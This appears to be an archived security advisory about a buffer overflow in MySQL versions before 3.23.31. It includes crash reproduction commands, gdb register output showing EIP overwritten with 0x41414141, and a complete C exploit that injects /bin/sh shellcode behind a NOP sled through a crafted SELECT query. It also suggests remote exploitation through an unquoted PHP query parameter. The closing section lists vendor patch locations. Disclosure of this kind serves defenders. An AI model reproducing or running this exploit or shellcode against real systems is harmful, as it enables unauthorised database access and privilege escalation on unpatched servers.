COMMAND
MySQL
SYSTEMS AFFECTED
MySQL prior to 3.23.31
PROBLEM
All versions of MySQL < 3.23.31 have a buffer-overflow which crash
the server and which seems to be exploitable (ie. 4141414 in eip).
An attacker could gain mysqld privileges (gaining access to all
the databases). You need a valid login/password to exploit this.
Well, not allways, in a default instalation one can exploit like
this: mysql -ustring -e<query> , no need for a valid database,
login, nor password. The real danger of this flaw is the
possibility of beeing exploited remotely. If there is a simple
php script (for example), that has a sql query like "$SQL=select *
from table where index=$index" (providing that $index isn't
quoted), one can exploit using somethig like:
script.php?index=a.(buffer).b
The first public report was made by Joao Gouveia aka Tharbad.
Here are some tests he made in 3.22.27 x86 (also tested on
v3.22.32).
On one terminal:
spike:/var/mysql # /sbin/init.d/mysql start
Starting service MySQL.
Starting mysqld daemon with databases from /var/mysql
done
spike:/var/mysql #
On the other terminal:
jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
Enter password:
(hanged..^C)
On the first terminal we have:
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1>
Number of processes running now: 0
mysqld restarted on Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended
gdb shows the following:
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)
Luis Miguel Ferreia Silva did exploit:
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
lms@ispgaya.pt
19/01/y2k+1
Compile:
gcc MySQLXploit.c -o MySQLX
Run with:
You can specify the offset for the exploit passing it as the 1st arg...
Example: ./MySQLX 0 ---> this is the default offset :]
*/
#include <stdio.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define NOP 0x90
// Our EVIL code...
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned
long get_sp(void) {
__asm__("movl %esp,%eax");
}
// Where it all happens...
main(int argc, char *argv[])
{
char *buffer, *ptr, tmp[1500];
long *addr_ptr, addr;
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;
printf("\nMySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt\n\n");
if (argc==2) offset=atoi(argv[1]);
else
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");
printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
if (!(buffer = malloc(bsize))) {
printf("ERROR!\n");
printf("Couldn't allocate memory...\n");
printf("Exiting...\n");
exit(0);
}
printf("SUCCESS!\n");
addr=get_sp()-offset;
printf("Using address : 0x%x\n", addr);
printf("Offset : %d\n",offset);
printf("Buffer Size : %d\n",bsize);
ptr=buffer;
addr_ptr=(long *) ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
for (i=0;i<bsize/2;i++) buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buffer[bsize-1]='\0';
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
printf("Oh k...i have the evil'buffer right here :P\n");
printf("So...[if all went well], prepare to be r00t...\n");
system(tmp);
}
SOLUTION
Upgrade to 3.23.31.
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-bench-3.23.32-2cl.i386.rpm
For RedHat:
ftp://updates.redhat.com/7.0/SRPMS/mysql-3.23.32-1.7.src.rpm
ftp://updates.redhat.com/7.0/SRPMS/mysqlclient9-3.23.22-3.src.rpm
ftp://updates.redhat.com/7.0/alpha/mysql-3.23.32-1.7.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/mysql-devel-3.23.32-1.7.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/mysql-server-3.23.32-1.7.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/mysqlclient9-3.23.22-3.alpha.rpm
ftp://updates.redhat.com/7.0/i386/mysql-3.23.32-1.7.i386.rpm
ftp://updates.redhat.com/7.0/i386/mysql-devel-3.23.32-1.7.i386.rpm
ftp://updates.redhat.com/7.0/i386/mysql-server-3.23.32-1.7.i386.rpm
ftp://updates.redhat.com/7.0/i386/mysqlclient9-3.23.22-3.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 7.1: 7.1/RPMS/MySQL-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-bench-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-client-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-devel-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-shared-libs-3.22.32-5.1mdk.i586.rpm
7.1/SRPMS/MySQL-3.22.32-5.1mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/MySQL-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-bench-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-client-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-devel-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-shared-3.23.31-1.1mdk.i586.rpm
7.2/SRPMS/MySQL-3.23.31-1.1mdk.src.rpm
7.2/RPMS/mod_php-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-dba_gdbm_db2-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-devel-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-gd-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-imap-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-ldap-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-manual-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-mysql-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-pgsql-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-readline-4.0.4pl1-1.2mdk.i586.rpm
7.2/SRPMS/php-4.0.4pl1-1.2mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/MySQL-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-bench-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-client-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-devel-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-shared-libs-3.22.32-5.1mdk.i586.rpm
1.0.1/SRPMS/MySQL-3.22.32-5.1mdk.src.rpm
For Debian:
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.diff.gz
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.dsc
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-client_3.22.32-4_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-server_3.22.32-4_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-client_3.22.32-4_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-server_3.22.32-4_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-client_3.22.32-4_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-server_3.22.32-4_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-client_3.22.32-4_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-server_3.22.32-4_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/php4-mysql_4.0.3pl1-0potato1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/mysql-server_3.22.32-4_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/mysql-server_3.22.32-4_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/mysql-3.22.32-3S.i386.rpm
RPMS/mysql-bench-3.22.32-3S.i386.rpm
RPMS/mysql-client-3.22.32-3S.i386.rpm
RPMS/mysql-devel-3.22.32-3S.i386.rpm
SRPMS/mysql-3.22.32-3S.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/mysql-3.22.32-3.i386.rpm
RPMS/mysql-bench-3.22.32-3.i386.rpm
RPMS/mysql-client-3.22.32-3.i386.rpm
RPMS/mysql-devel-3.22.32-3.i386.rpm
SRPMS/mysql-3.22.32-3.src.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/databases/mysql-3.23.32.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/databases/mysql-3.23.32.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/databases/mysql-3.23.32.tgz